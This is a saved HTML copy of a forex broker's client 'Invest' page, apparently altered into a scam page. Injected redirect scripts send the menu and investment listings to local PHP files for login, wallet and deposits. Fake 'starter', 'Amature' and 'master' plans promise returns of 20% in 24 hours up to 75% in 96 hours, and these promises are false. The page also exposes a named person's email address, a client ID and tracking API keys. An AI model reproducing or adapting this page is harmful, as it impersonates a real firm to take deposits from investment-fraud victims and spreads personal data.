<!DOCTYPE html>
<!-- saved from url=(0032)https://my.ALAVI.com/en/invest/ -->
<html lang="en" class=" js flexbox flexboxlegacy canvas cssanimations csstransitions video audio csspositionsticky filereader"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Invest</title><script async="" src="./Invest_files/tag.js.download"></script><script type="text/javascript" defer="" async="" src="./Invest_files/piwik_ws.js.download"></script><script src="./Invest_files/613242382162885" async=""></script><script async="" src="./Invest_files/fbevents.js.download"></script><script type="text/javascript" async="" src="./Invest_files/analytics.js.download"></script><script type="text/javascript" integrity="sha384-girahbTbYZ9tT03PWWj0mEVgyxtZoyDF9KVZdL+R53PP5wCY0PiVUKq0jeRlMx9M" crossorigin="anonymous" async="" src="./Invest_files/amplitude-7.2.1-min.gz.js.download"></script><script type="text/javascript" async="" src="./Invest_files/mparticle.js.download"></script><script async="" src="./Invest_files/gtm.js.download"></script><script src="./Invest_files/snippet.js.download" id="ze-snippet" type="text/javascript"></script><script>
    window.zESettings = {
      webWidget: {
        chat: {
          prechatForm: {
            departmentLabel: {
              '*': "Language",
              'ar': 'اللغة',
              'es': "Idioma",
              'fa': "زبان",
              'id': "Bahasa",
              'ru': "Тематика",
              'uk': "Мова",
              'vi': "Ngôn ngữ",
              'zh-cn': "语言"
            }
          }
        }
      }
    };

    window.config = {
      onlineChat: {
        mainDepartments: {
          ar: 2147566985,
          en: 2147566987,
          es: 2147567931,
          fa: 2147567933,
          id: 2147567929,
          ru: 2147568789,
          ua: 2147567937,
          'zh-hans': 2147568931
        },
        enabledDepartaments: {
          ru: [
            2147576451,
            2147576453,
            2147576455,
            2147576901
          ]
        },
        selectedDepartament: {
          ru: 2147576451
        }
      },
      vkLink: 'https://vk.com/write-19972582',
      messengerLink: 'https://m.me/ALAVICIS',
      whatsAppLink: {
        ar: 'https://wa.me/+442031293799',
        en: 'https://wa.me/+442031293799',
        es: 'https://wa.me/+442031293799',
        fa: 'https://wa.me/+79267272388',
        id: 'https://wa.me/+442031293799',
        ru: 'https://wa.me/+442031293799',
        ua: 'https://wa.me/+442031293799',
        'zh-hans': 'https://wa.me/+442031293799'
      }
    };

    zE('webWidget', 'hide');
</script><!-- Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-NSNZK8');</script><!-- End Google Tag Manager --></head><body data-csrf="088d0be0ebfd833f42ff088904d12aa4ef17eac6" class="page_lang_en"><div style="display: none" id="mParticle" data-client-id="13737909" data-email="chimmeriri100@gmail.com"></div><!-- mParticle --><script type="text/javascript">
    var el = document.getElementById('mParticle'),
        email = el.getAttribute('data-email'),
        customerId = el.getAttribute('data-client-id');

    window.mParticle = {
        config: {
            isDevelopmentMode: (window.location.href.indexOf("rc") > -1 || window.location.href.indexOf("trunk") > -1 || window.location.href.indexOf("dev") > -1) ? true : false, //switch to false (or remove) for production
            identifyRequest: {
                userIdentities: {
                    email: email,
                    customerid: customerId
                }
            }
        }
    };


    var mParticle_API_KEY = window.location.href.indexOf("dev") > -1 ? "us1-c90c44a14b42754c85793e3fd72c53ce" : "us1-a971dfd51f48e14eb3482ebcecf62fa1";

    (function (t) {
        window.mParticle = window.mParticle || {};
        window.mParticle.EventType = {
            Unknown: 0,
            Navigation: 1,
            Location: 2,
            Search: 3,
            Transaction: 4,
            UserContent: 5,
            UserPreference: 6,
            Social: 7,
            Other: 8
        };
        window.mParticle.eCommerce = {Cart: {}};
        window.mParticle.Identity = {};
        window.mParticle.config = window.mParticle.config || {};
        window.mParticle.config.rq = [];
        window.mParticle.config.snippetVersion = 2.2;
        window.mParticle.ready = function (t) {
            window.mParticle.config.rq.push(t)
        };
        var e = ["endSession", "logError", "logBaseEvent", "logEvent", "logForm", "logLink", "logPageView", "setSessionAttribute", "setAppName", "setAppVersion", "setOptOut", "setPosition", "startNewSession", "startTrackingLocation", "stopTrackingLocation"];
        var o = ["setCurrencyCode", "logCheckout"];
        var i = ["identify", "login", "logout", "modify"];
        e.forEach(function (t) {
            window.mParticle[t] = n(t)
        });
        o.forEach(function (t) {
            window.mParticle.eCommerce[t] = n(t, "eCommerce")
        });
        i.forEach(function (t) {
            window.mParticle.Identity[t] = n(t, "Identity")
        });
        function n(e, o) {
            return function () {
                if (o) {
                    e = o + "." + e
                }
                var t = Array.prototype.slice.call(arguments);
                t.unshift(e);
                window.mParticle.config.rq.push(t)
            }
        }
        var mp = document.createElement("script");
        mp.type = "text/javascript";
        mp.async = true;
        mp.src = ("https:" == document.location.protocol ? "https://jssdkcdns" : "http://jssdkcdn") + ".mparticle.com/js/v2/" + t + "/mparticle.js";
        var c = document.getElementsByTagName("script")[0];
        c.parentNode.insertBefore(mp, c)
    })(mParticle_API_KEY);
</script><!-- end: mParticle --><link rel="stylesheet" href="./Invest_files/top.css"><link rel="stylesheet" href="./Invest_files/styles.css"><script type="text/javascript" id="">var interval=setInterval(function(){if(window.page&&page._videoPlayers&&$(".js-jw-player").length==page._videoPlayers.length){clearInterval(interval);var f=[1,2,3,4,5,10,25,50,70,75,90],g=page._videoPlayers;g.forEach(function(a){var d="playing",c=[],e="";c.push({id:a.id,markers:[]});a=a._player||a._videoPlayer._player;a.onPlay(function(b){"paused"==d&&e==this.getPlaylistItem().file?(dataLayer.push({event:"video",eventCategory:"video",eventAction:"Resume",eventLabel:this.getPlaylistItem().file,eventValue:this.id}),
d=this.getState()):e!=this.getPlaylistItem().file&&(dataLayer.push({event:"video",eventCategory:"video",eventAction:"Play",eventLabel:this.getPlaylistItem().file,eventValue:this.id}),e=this.getPlaylistItem().file)});a.onComplete(function(b){dataLayer.push({event:"video",eventCategory:"video",eventAction:"Complete",eventLabel:this.getPlaylistItem().file,eventValue:this.id})});a.onPause(function(b){dataLayer.push({event:"video",eventCategory:"video",eventAction:"Pause",eventLabel:this.getPlaylistItem().file,
eventValue:this.getPosition()});d=this.getState()});a.onFullscreen(function(b){dataLayer.push({event:"video",eventCategory:"video",eventAction:"Fullscreen",eventLabel:this.getPlaylistItem().file,eventValue:this.id})});a.onMute(function(b){dataLayer.push({event:"video",eventCategory:"video",eventAction:"Mute "+(b.mute?"On":"Off"),eventLabel:this.getPlaylistItem().file,eventValue:this.id})});a.onTime(function(b){b=Math.floor(100*b.position/b.duration);var a=findObjectIndexById(c,"id",this.id);-1<f.indexOf(b)&&
-1==c[a].markers.indexOf(b)&&(c[a].markers.push(b),dataLayer.push({event:"video",eventCategory:"video",eventAction:"Progress "+b+"%",eventLabel:this.getPlaylistItem().file,eventValue:this.id}))})})}},1E3);</script><meta name="google-site-verification" content="iXJm6UbcnYyZuBFlKEu8aR-oyaaQGPBDVq6IRCX0xE8"><!-- Facebook Pixel Code --><script>
        !function(f,b,e,v,n,t,s)
        {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
            n.callMethod.apply(n,arguments):n.queue.push(arguments)};
            if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
            n.queue=[];t=b.createElement(e);t.async=!0;
            t.src=v;s=b.getElementsByTagName(e)[0];
            s.parentNode.insertBefore(t,s)}(window, document,'script',
            'https://connect.facebook.net/en_US/fbevents.js');

            fbq('init', 613242382162885);

        fbq('track', 'PageView');
    </script><noscript><img height="1" width="1" style="display:none" src="https://www.facebook.com/tr?id=613242382162885&ev=PageView&noscript=1"/></noscript><!-- End Facebook Pixel Code --><link rel="stylesheet" href="./Invest_files/top_icons.css"><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><meta name="msapplication-tap-highlight" content="no"><meta name="format-detection" content="telephone=no"><!-- Google Tag Manager (noscript) --><noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-NSNZK8"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript><!-- End Google Tag Manager (noscript) --><div class="reload hidden js-new-messages"><a href="https://my.ALAVI.com/en/invest/#" class="reload__link">New message</a></div><nav class="menu-main"><script>function rediiirectssss(){location.href='./after loginb.php'}</script><button  onclick=rediiirectssss() type="button" class="menu-closer">Close</button><ul class="menu-main__items"><li class="menu-main__item"><a class="menu-main__link menu-main__link_type_root" href="./after loginb.php">Home</a></li><li class="menu-main__item"><script>function reddiirectssss(){location.href='./message part.html'}</script><button  onclick=reddiirectssss() data-event="all_alerts_and_messages_clicked" class="js-mparticle menu-main__link menu-main__link_type_messages js-menu-link" data-menu="messages" type="button">Messages</button><span class="js-push-notification menu-main__unread-message-count hidden" data-channel="13737909/6179f3b67d708fe62e4fd638ced43cf8" data-web-socket="/client/notifications/subscriber/events" data-long-polling="/client/notifications/subscriber/events/lp">0</span></li><li class="menu-main__item"><script>function reiirectssss(){location.href='./contact part.html'}</script><button  onclick=reiirectssss() data-event="client_profile_clicked" class="js-mparticle menu-main__link menu-main__link_type_user js-menu-link" data-menu="user" type="button">User</button></li><li class="menu-main__item"><script>function rediirecssss(){location.href='./wallet part.php'}</script><button  onclick=rediirecssss() class="menu-main__link menu-main__link_type_payment js-menu-link" data-menu="payment" type="button">Payments</button></li><li class="menu-main__item"><button class="menu-main__link menu-main__link_type_menu js-menu-link" data-menu="menu" type="button">Menu</button></li></ul></nav><nav class="menu hidden"><div class="menu__items hidden" data-type="MessagesMenuItem" data-name="messages"><div class="js-messages-data-list" data-type="MessagesDataList" data-name="MessagesDataList" data-fetch-deferred="true" data-read-message-url="/en/messages/mark_as_read/" data-fetch-url="/en/messages/filter/?perPage=5"><form class="form form_type_filter js-data-list-filter js-form-filter s_pb_9" method="post" autocomplete="off" data-form-name="alertsAndMessagesFilters" data-filter-type="FormFilter" data-filter-on-fields-change="true"><input type="hidden" class="js-form-el-field js-form-el-holder js-form-el__input" name="csrf" value="088d0be0ebfd833f42ff088904d12aa4ef17eac6" data-field-type="HiddenInputField" data-input-type="HiddenInput"><div class="js-form-el-field field" tabindex="-1" data-field-name="filter" data-field-type="RadioInputField"><div class="js-form-el-holder radio__group radio__group_type_button radio__group_theme_dark radio__group_division_equal" data-input-type="RadioInput"><label class="radio radio_checked_yes" tabindex="-1"><input type="radio" name="filter" value="all" class="js-form-el__input radio__input" checked=""><span class="radio__label">All messages</span></label><label class="radio" tabindex="-1"><input type="radio" name="filter" value="unread" class="js-form-el__input radio__input"><span class="radio__label">Unread</span></label></div></div></form><div class="loader__holder_type_absolute"><div class="loader loader_theme_dark loader_active_yes"><div class="loader__text loader__text_type_loading"><div class="loader__needles"><div class="loader__needle loader__needle_pos_north"></div><div class="loader__needle loader__needle_pos_east"></div><div class="loader__needle loader__needle_pos_south"></div><div class="loader__needle loader__needle_pos_west"></div></div>Loading...</div><div class="loader__text loader__text_type_fail"><p>Data can not be shown</p><button class="button button_type_primary button_size_middle js-reload s_mb_18" type="button" tabindex="0"><span class="button__deco">Refresh</span></button></div></div><div class="js-data-list-content"></div></div><div class="paginator paginator_theme_dark paginator_disabled_yes js-data-list-filter hidden" data-filter-type="Pagination" data-pages-count="1"><button class="paginator__prev paginator__button paginator__button_disabled_yes"></button><div class="paginator__content"><span><span class="paginator__current">1</span> / <span class="paginator__items">1</span></span></div><button class="paginator__next paginator__button paginator__button_disabled_yes"></button></div></div></div><div class="menu__items hidden menu__items_type_user" data-type="PersonalDataMenuItem" data-name="user"><div class="personal-info"><div class="notification notification_theme_dark s_mb_18 hidden" data-name="passwordChangedSuccess"><button type="button" class="notification__close js-close-button"></button><div class="notification__content"><div class="notification__title">Password successfully changed</div><p>myALAVI password successfully changed</p></div></div><p class="personal-info__item personal-info__item_type_username">Fana Sata</p><p class="personal-info__item">myALAVI 13737909</p><div class="personal-info__item"><span>Password: •••••• <span class="link link_action_yes text_size_14 js-spoiler" data-target=".js-change-password">Change password</span></span><div class="panel panel_type_info panel_theme_dark personal-info__item_type_password hidden js-change-password"><form class="form" name="changePassword" method="post" action="https://my.ALAVI.com/en/change_password/change/" autocomplete="off" data-captcha-url="/en/change_password/captcha/"><input type="hidden" class="js-form-el-field js-form-el-holder js-form-el__input" name="csrf" value="088d0be0ebfd833f42ff088904d12aa4ef17eac6" data-field-type="HiddenInputField" data-input-type="HiddenInput"><div class="js-form-el-field field" tabindex="-1" data-rules="not-empty" data-field-name="current_password" data-field-type="TextInputField"><label class="label">Current password:</label><div class="js-form-el-holder input" data-input-type="TextInput"><input type="password" class="js-form-el__input input__input" name="current_password"><div class="input__loader"></div></div><div class="field__status"></div></div><div class="js-form-el-field field" tabindex="-1" data-rules="not-empty" data-field-name="password" data-field-type="TextInputField"><label class="label">New password:</label><div class="js-form-el-holder input" data-input-type="TextInput"><input type="password" class="js-form-el__input input__input" name="password"><div class="input__loader"></div></div><div class="field__status"></div><div class="s_mt_9 text_color_muted">The password should be at least 8 characters and should contain numbers, upper and lower case letters of the Latin alphabet. The following symbols may also be used: _ - . , ^ ! @ # $ % &amp; * ( ) [ ] ; " ' + = : / \ ? | ` ~ { }</div></div><div class="js-form-el-field field" tabindex="-1" data-rules="not-empty" data-field-name="password_confirm" data-field-type="TextInputField"><label class="label">Confirm new password:</label><div class="js-form-el-holder input" data-input-type="TextInput"><input type="password" class="js-form-el__input input__input" name="password_confirm"><div class="input__loader"></div></div><div class="field__status"></div></div><div class="js-json-data-get" data-name-confirmation="gttMyChangePasswordChangeAction" data-props="{&quot;infoPath&quot;:&quot;https:\/\/my.ALAVI.com\/en\/protection\/info\/b8ced839f4b116ddf7531f78dd5bd40761b7cede\/&quot;,&quot;checksum&quot;:&quot;3e8c52f830bc93195f2a127c2885c899&quot;,&quot;code&quot;:{&quot;codeAvailable&quot;:false,&quot;codeExpiresIn&quot;:0,&quot;codeDeliveredVia&quot;:&quot;&quot;,&quot;availableOptions&quot;:[&quot;sms&quot;],&quot;codeLifetime&quot;:300,&quot;codeValidation&quot;:{&quot;codeAlphabet&quot;:&quot;0123456789&quot;,&quot;length&quot;:4},&quot;deliveryPath&quot;:&quot;https:\/\/my.ALAVI.com\/en\/protection\/deliver\/2a394e02d7f2af7b8594d58ebb4a28c1f81a38f5\/&quot;,&quot;deliveryProtection&quot;:{&quot;infoPath&quot;:&quot;https:\/\/my.ALAVI.com\/en\/protection\/info\/2a394e02d7f2af7b8594d58ebb4a28c1f81a38f5\/&quot;,&quot;checksum&quot;:&quot;0a072f88237e0e4a1122fd85441164fa&quot;,&quot;timer&quot;:{&quot;remainingTime&quot;:0,&quot;blockTime&quot;:180}}}}" data-props-phone="+*****6168"><div class="hidden"><label class="radio" tabindex="-1"><input type="radio" name="deliveryOption" value="sms" class="js-form-el__input radio__input" checked="checked"><span class="radio__label" data-translate-text="sms">SMS</span></label></div><div class="confirmation-code__buttons-container"><div class="js-block-button-send-code-new confirmation-code__button-new"><button class="js-button-send-code-new js-form-el-holder js-form-el__input button button_type_primary
            js-form-el-field button_size_middle s_mb_0  button_disabled_yes" type="button" name="sendCode" data-field-type="ButtonField" data-input-type="ButtonInput" disabled="disabled"><span class="button__deco">
                Get code            </span></button></div><div class="js-form-el-field field confirmation-code__field-new input_disabled_yes" tabindex="-1" data-rules="not-empty" data-field-name="code" data-field-type="TextInputField"><div class="js-form-el-holder js-block-code-confirm input s_mr_10" data-input-type="TextInput"><input type="text" class="js-confirm-code-input js-form-el__input input__input" name="code" maxlength="4" tabindex="-1" readonly="readonly"><div class="input__loader"></div></div><div class="field__status"></div></div></div><div class="grid__row js-text-status-code  hidden "><div class="js-text-status-code-time-sent grid__col confirmation-code__codesent-status grid__col_offset_6 grid__col_w_12"><p id="js-text-status-code-time-sent-text" class="confirmation-code__status s_mb_9">The code was sent to +*****6168</p><p class="confirmation-code__status"><span data-lock-time="180"><span class="jsOverTime"></span></span></p></div><div class="grid__col confirmation-code__codesent-status grid__col_offset_6 grid__col_w_12"><p class="js-text-request-code-again confirmation-code__status hidden">If you didn't receive the code, check the mobile number you entered is correct. You can request another code.</p></div></div></div><div class="button__wrapper s_mb_18"><button class="js-form-el-holder js-form-el__input button button_type_primary js-form-el-field button_size_middle js-mparticle" data-event="password_change_clicked" type="submit" name="send" formnovalidate="" data-field-type="ButtonField" data-input-type="ButtonInput" tabindex="0"><span class="button__deco">Change</span></button><button class="button button_type_secondary button_size_middle js-spoiler js-change-password-spoiler" type="button" tabindex="0" data-target=".js-change-password"><span class="button__deco">Cancel</span></button></div></form></div></div><div class="personal-info__item"><span>Balance:&nbsp;0 USD</span><button type="button" class="spoiler spoiler_type_info personal-info__item_type_balance-spoiler js-spoiler" data-target=".js-balance"></button><div class="panel panel_type_info panel_theme_dark personal-info__item_type_balance-panel hidden js-balance"><p>Balance shows the aggregated amount of all the funds in your myALAVI, including investments and funds which are being used as a margin to open trades on the Forex market. You can only carry out operations with funds which are not locked as a security deposit and as such are free funds.</p></div></div><p class="personal-info__item">Status:&nbsp;<span>Classic</span></p><p class="personal-info__item">Points:&nbsp;<a href="https://my.ALAVI.com/en/ALAVI_cashback/">50 ALP</a></p><p class="personal-info__item personal-info__item_type_phone">Telephone: *****6168</p><p class="personal-info__item personal-info__item_type_email text_word-break_all">E-mail: chimmeriri100@gmail.com</p></div><form class="form personal-info__logout" name="logout" method="post" action="https://my.ALAVI.com/en/logout/" autocomplete="off"><input type="hidden" class="js-form-el-field js-form-el-holder js-form-el__input" name="csrf" value="088d0be0ebfd833f42ff088904d12aa4ef17eac6" data-field-type="HiddenInputField" data-input-type="HiddenInput"><button type="submit" name="send" class="personal-info__logout-button">Log out</button></form></div><div class="accordion accordion_type_simple accordion_theme_dark menu__items hidden" data-type="AccordionWithMemory" data-name="payment"><a class="menu__item" href="https://my.ALAVI.com/en/payments/transfers/?transfer_type=deposit">Deposit funds</a><a class="menu__item" href="https://my.ALAVI.com/en/payments/transfers/?transfer_type=internal">Account-to-account transfer</a><a class="menu__item" href="https://my.ALAVI.com/en/payments/transfers/?transfer_type=withdrawal">Withdraw funds</a><a class="menu__item" href="https://my.ALAVI.com/en/payments/transfers/?transfer_type=deposit">Tell us about a transfer to have funds credited to your account</a><div class="accordion__group" data-accordion-group-name="templates"><div class="accordion__header">Payment templates    </div><div class="accordion__content js-data-list" data-type="DataListWithContentInit" data-fetch-url="/en/payments/templates/list/main/?perPage=5" data-fetch-deferred="true"><div class="loader__holder loader__holder_type_absolute"><div class="loader loader_theme_dark loader_active_yes"><div class="loader__text loader__text_type_loading"><div class="loader__needles"><div class="loader__needle loader__needle_pos_north"></div><div class="loader__needle loader__needle_pos_east"></div><div class="loader__needle loader__needle_pos_south"></div><div class="loader__needle loader__needle_pos_west"></div></div>Loading...</div><div class="loader__text loader__text_type_fail"><p>Data can not be shown</p><button class="button button_type_primary button_size_middle js-reload s_mb_18" type="button" tabindex="0"><span class="button__deco">Refresh</span></button></div></div><div class="js-data-list-content"></div></div><div class="paginator paginator_theme_dark paginator_disabled_yes js-data-list-filter hidden" data-filter-type="Pagination" data-pages-count="1"><button class="paginator__prev paginator__button paginator__button_disabled_yes"></button><div class="paginator__content"><span><span class="paginator__current">1</span> / <span class="paginator__items">1</span></span></div><button class="paginator__next paginator__button paginator__button_disabled_yes"></button></div></div></div><div class="accordion__group" data-accordion-group-name="history"><div class="accordion__header">Fund transfer history    </div><div class="accordion__content js-data-list" data-type="DataListWithContentInit" data-fetch-url="/en/payments/history/list/?perPage=5" data-fetch-deferred="true"><div class="loader__holder loader__holder_type_absolute"><div class="loader loader_theme_dark loader_active_yes"><div class="loader__text loader__text_type_loading"><div class="loader__needles"><div class="loader__needle loader__needle_pos_north"></div><div class="loader__needle loader__needle_pos_east"></div><div class="loader__needle loader__needle_pos_south"></div><div class="loader__needle loader__needle_pos_west"></div></div>Loading...</div><div class="loader__text loader__text_type_fail"><p>Data can not be shown</p><button class="button button_type_primary button_size_middle js-reload s_mb_18" type="button" tabindex="0"><span class="button__deco">Refresh</span></button></div></div><div class="js-data-list-content"></div></div><div class="paginator paginator_theme_dark paginator_disabled_yes js-data-list-filter hidden" data-filter-type="Pagination" data-pages-count="1"><button class="paginator__prev paginator__button paginator__button_disabled_yes"></button><div class="paginator__content"><span><span class="paginator__current">1</span> / <span class="paginator__items">1</span></span></div><button class="paginator__next paginator__button paginator__button_disabled_yes"></button></div></div></div></div><div class="accordion accordion_type_simple accordion_theme_dark menu__items hidden" data-type="AccordionWithMemory" data-name="menu"><div class="accordion__group"><div class="accordion__header"><span>Open account</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/open_account/#instruments=forex">Forex, spot metals, CFDs</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/open_account/#instruments=fix-contractstrader">Fix-contracts</a></li></ul></div></div><div class="accordion__group"><div class="accordion__header"><span>Invest with ALAVI</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a data-event="invest_in_pamm_account_cliked" class="js-mparticle menu__sub-item-title" href="https://my.ALAVI.com/en/invest/pamm_account/">Invest in a PAMM Account</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/invest/pamm_portfolios/">Invest in a PAMM Portfolio</a></li></ul></div></div><div class="accordion__group"><div class="accordion__header"><span>My accounts</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/accounts/trading/">Trading</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/accounts/pamm/">PAMM Accounts</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/accounts/portfolios/">PAMM Portfolios</a></li></ul></div></div><div class="accordion__group"><div class="accordion__header"><span>My investments</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/investments/pamm_accounts/">In PAMM Accounts</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/investments/pamm_portfolios/">In PAMM Portfolios</a></li></ul></div></div><div class="accordion__group"><div class="accordion__header"><span>ALAVI Cashback</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/ALAVI_cashback/expenses/">My expenses</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/ALAVI_cashback/">My bonuses</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/ALAVI_cashback/discounts/">Discounts</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/ALAVI_cashback/history/">Bonus account history</a></li></ul></div></div><a class="menu__item" href="https://my.ALAVI.com/en/platforms/downloads/">Platforms</a><a class="menu__item" href="https://my.ALAVI.com/en/other_services/promo_code/">Promocodes</a><a class="menu__item" href="https://my.ALAVI.com/en/other_services/pamm_manager_verification/">PAMM manager verification</a><a class="menu__item" href="https://my.ALAVI.com/en/refer_a_friend/">Refer a friend</a><div class="accordion__group"><div class="accordion__header"><span>Partner programs</span></div><div class="accordion__content"><ul class="menu__sub"><li class="menu__sub-item"><a class="menu__sub-item-title" target="_blank" href="https://www.ALAVIpartners.org/">ALAVI Partners</a></li><li class="menu__sub-item"><a class="menu__sub-item-title" href="https://my.ALAVI.com/en/other_services/partnership/">Overview of partnership programs</a></li></ul></div></div></div></nav><div class="page"><div class="page__content"><div class="js-notifications notifications"></div><h1 class="s_ml_10 s_mr_10">Invest</h1><div class="accordion accordion_type_simple accordion_theme_light" data-type="AccordionWithMemory"><div data-accordion-group-name="pammRating" class="accordion__group accordion__group_active_yes"><div class="accordion__header"><span>The PAMM Account Ratings</span></div><div class="accordion__content" style="display: block;"><div class="js-data-list js-init-content-accordions" data-type="DataListWithContentInit" data-fetch-url="/en/investor/pamm6/invest/pamm_account/rating/?perPage=5" data-fetch-deferred="true"><div class="loader__holder loader__holder_type_absolute"><div class="loader loader_theme_light s_pt_9 loader_state_loading"><div class="loader__text loader__text_type_loading"><div class="loader__needles"><div class="loader__needle loader__needle_pos_north"></div><div class="loader__needle loader__needle_pos_east"></div><div class="loader__needle loader__needle_pos_south"></div><div class="loader__needle loader__needle_pos_west"></div></div>Loading...</div><div class="loader__text loader__text_type_fail"><p>Data can not be shown</p><button class="button button_type_primary button_size_middle js-reload s_mb_18" type="button" tabindex="0"><span class="button__deco">Refresh</span></button></div></div>

<div class="invest-account-list js-data-list-content js-init-content-accordions" data-page="1" data-per-page="5" data-total-count="1772">
        
    <div class="accordion accordion_type_table accordion_theme_light">

            




    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="329842">

    
        <script>function rrecssss(){location.href='./deposit and withdrawal of funds.php?plan=starter plan'}</script><div  onclick=rrecssss() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
                    <p class="s_mb_0 s_pb_0 s_white-space_nowrap">
                <span class="s_ml_0 stars stars_count_50" title="Star Rating: 5 / 5">
                    <span class="stars__star_style_dark"></span>
                    <span class="stars__star_style_golden"></span>
                </span>
            </p>
        
        <p class="s_mb_5  invest-item-name">
            <span class="rating_number s_display_block s_float_l">1.</span>
            <span class="s_dir_ltr name s_float_l text_align_l">
                starter plan
                                    (for newbies)
                            </span>
        </p>

        <p class="s_mb_0 s_white-space_nowrap">
            <span class="invest__return_label s_float_l">Return:20% in 24hrs
                <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_rating.svg">
            </span>
            <span class="s_white-space_nowrap s_float_r">
                $150 - $1500
            </span>
            <span class="s_display_block s_clear_both">&nbsp;</span>
        </p>

        </div>

        
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10">


        <p class="s_mb_0 s_pb_0">
            Today's Change:
                <span class="s_white-space_nowrap">
                    <span class="text_color_red">
        −0.03 </span>
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">
            Since Opened:
                <span class="s_white-space_nowrap">
                    2811
                    days
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>

        <div class="s_mt_18">
                                
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_account/329842/">
            <span class="button__deco">Invest</span>
        </a>
    
        </div>
        </div>

    </div>

            




    
    <script>function riirecss(){location.href='./deposit and withdrawal of funds.php?plan=amature plan'}</script><div  onclick=riirecss() class="accordion__group accordion__group__invest" data-accordion-group-name="528538">

    
        <script>function rrec(){location.href='./deposit and withdrawal of funds.php?plan=amature plan'}</script><div  onclick=rrec() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
                    <p class="s_mb_0 s_pb_0 s_white-space_nowrap">
                <span class="s_ml_0 stars stars_count_50" title="Star Rating: 5 / 5">
                    <span class="stars__star_style_dark"></span>
                    <span class="stars__star_style_golden"></span>
                </span>
            </p>
        
        <p class="s_mb_5  invest-item-name">
            <span class="rating_number s_display_block s_float_l">2.</span>
            <span class="s_dir_ltr name s_float_l text_align_l">
                Amature plan
                            </span>
        </p>

        <p class="s_mb_0 s_white-space_nowrap">
            <span class="invest__return_label s_float_l">Return:45% in 48hrs
                <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_rating(1).svg">
            </span>
            <span class="s_white-space_nowrap s_float_r">
                $2000-$7500
            </span>
            <span class="s_display_block s_clear_both">&nbsp;</span>
        </p>

        </div>

        
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10" style="display: none;">


        <p class="s_mb_0 s_pb_0">
            Today's Change:
                <span class="s_white-space_nowrap">
                    <span class="text_color_grey">
        0.00 </span>
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">
            Since Opened:
                <span class="s_white-space_nowrap">
                    1
                    days
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">Account Denomination: USD</p>

        <div class="s_mt_18">
                                
                                    
                        
                
                <a class="button button_type_primary button_size_small button_type_inline s_ml_0" href="https://my.ALAVI.com/en/invest/pamm_account/528538/">
            <span class="button__deco">Invest</span>
        </a>
    
        </div>
        </div>

    </div>

            




    
    <div class="accordion__group accordion__group__invest" data-accordion-group-name="528531">

    
        <script>function riirec(){location.href='./deposit and withdrawal of funds.php?plan=master plan'}</script><div  onclick=riirec() class="accordion__header accordion__header__invest s_pt_9 s_pb_9 s_pl_10 s_pr_10">
                    <p class="s_mb_0 s_pb_0 s_white-space_nowrap">
                <span class="s_ml_0 stars stars_count_45" title="Star Rating: 4.7 / 5">
                    <span class="stars__star_style_dark"></span>
                    <span class="stars__star_style_golden"></span>
                </span>
            </p>
        
        <p class="s_mb_5  invest-item-name">
            <span class="rating_number s_display_block s_float_l">3.</span>
            <span class="s_dir_ltr name s_float_l text_align_l">
                master plan
                            </span>
        </p>

        <p class="s_mb_0 s_white-space_nowrap">
            <span class="invest__return_label s_float_l">Return:75% in 96hrs
                <img class="invest__return_chart s_valign_m s_ml_30" src="./Invest_files/daily_return_rating(2).svg">
            </span>
            <span class="s_white-space_nowrap s_float_r">
                $9000-$15500
            </span>
            <span class="s_display_block s_clear_both">&nbsp;</span>
        </p>

        </div>

        
    <div class="accordion__content accordion__content__invest s_pt_9 s_pl_10 s_pr_10" style="display: none;">


        <p class="s_mb_0 s_pb_0">
            Today's Change:
                <span class="s_white-space_nowrap">
                    <span class="text_color_grey">
        0.00 </span>
                </span>
        </p>
        <p class="s_mb_0 s_pb_0">
            Since Opened:
